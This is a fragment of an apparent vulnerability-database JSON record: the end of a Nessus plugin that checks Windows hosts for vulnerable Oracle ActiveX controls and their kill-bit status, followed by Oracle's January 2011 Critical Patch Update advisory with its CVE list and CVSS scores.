script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) exit(1, \"activex_init() failed.\");\n\nvar clsids = make_list(\n '{4932CEF4-2CAA-11D2-A165-0060081C43D9}',\n '{F647CBE5-3C01-402A-B3F0-502A77054A24}',\n '{10696DE0-CF47-4ad4-B1AE-CC1F4021D65B}',\n '{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}',\n '{DAFA4BF6-C807-463c-8745-C9E0C90CF84F}',\n '{D63891F1-E026-11D3-A6C3-005004055C6C}'\n);\n\n# Determine if any of the controls are installed.\nvar info = '';\nvar installs = 0;\n\nvar clsid, file, version, s;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n if (!file) continue;\n\n installs++;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += '\\n Class Identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n# Report findings.\nif (installs)\n{\n if (info)\n {\n if (report_paranoia > 1)\n {\n if (installs == 1) s = \" was\";\n else s = \"s were\";\n\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit' + s + '\\n' +\n 'set for the control\\'s CLSID because of the Report Paranoia setting' + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n if (installs == 1) s = \"its kill bit is not set so it is\";\n else s = \"their kill bits are not set so they are\";\n\n report = info +\n '\\n' +\n 'Moreover, ' + s + ' accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n }\n else\n {\n if (installs == 1) exit(0, \"The control is installed but its kill bit is set.\");\n else exit(0, installs+\" instances of the controls are installed but their kill bits are set.\");\n }\n}\nelse exit(0, \"None of the affected controls are installed.\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:46:13", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 66 new security fixes across all product families listed below.\n", "edition": 2, "cvss3": {}, "published": "2011-01-18T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2011", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3598", "CVE-2010-3562", "CVE-2010-4428", "CVE-2010-4459", "CVE-2010-4445", "CVE-2010-4416", "CVE-2010-3557", "CVE-2010-4429", "CVE-2010-3505", "CVE-2010-4420", "CVE-2010-3551", "CVE-2010-4458", "CVE-2010-3553", "CVE-2010-2632", "CVE-2010-1227", "CVE-2010-3566", "CVE-2010-4439", "CVE-2010-4444", "CVE-2010-3565", "CVE-2010-3599", "CVE-2010-3594", "CVE-2010-4425", "CVE-2010-3589", "CVE-2010-3572", "CVE-2010-4433", "CVE-2010-3593", "CVE-2010-4426", "CVE-2010-4453", "CVE-2010-4436", "CVE-2010-2935", "CVE-2010-3597", "CVE-2010-4427", "CVE-2010-3592", "CVE-2010-4423", "CVE-2010-3574", "CVE-2010-4441", "CVE-2010-4461", "CVE-2010-4419", "CVE-2010-4435", "CVE-2010-3600", "CVE-2010-3541", "CVE-2010-4431", "CVE-2010-4455", "CVE-2009-4269", "CVE-2010-3571", "CVE-2009-3555", "CVE-2010-4457", "CVE-2010-4417", "CVE-2010-3590", "CVE-2010-4442", "CVE-2010-4464", "CVE-2010-3559", "CVE-2010-1321", "CVE-2010-4456", "CVE-2010-3556", "CVE-2010-4443", "CVE-2010-4414", "CVE-2010-3561", "CVE-2010-3595", "CVE-2010-3549", "CVE-2010-4413", "CVE-2010-3554", "CVE-2010-4415", "CVE-2010-4418", "CVE-2010-4434", "CVE-2010-4421", "CVE-2010-2936", "CVE-2010-3555", "CVE-2010-4430", "CVE-2010-4437", "CVE-2010-3588", "CVE-2010-3510", "CVE-2010-4424", "CVE-2010-4449", "CVE-2010-3567", "CVE-2010-3573", "CVE-2010-3586", "CVE-2010-3591", "CVE-2010-3548", "CVE-2010-4446", "CVE-2010-4432", "CVE-2010-3568", "CVE-2010-3587", "CVE-2010-4460", "CVE-2010-4438", "CVE-2010-4440", "CVE-2010-3569"], "modified": "2011-02-01T00:00:00", "id": "ORACLE:CPUJAN2011-194091", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
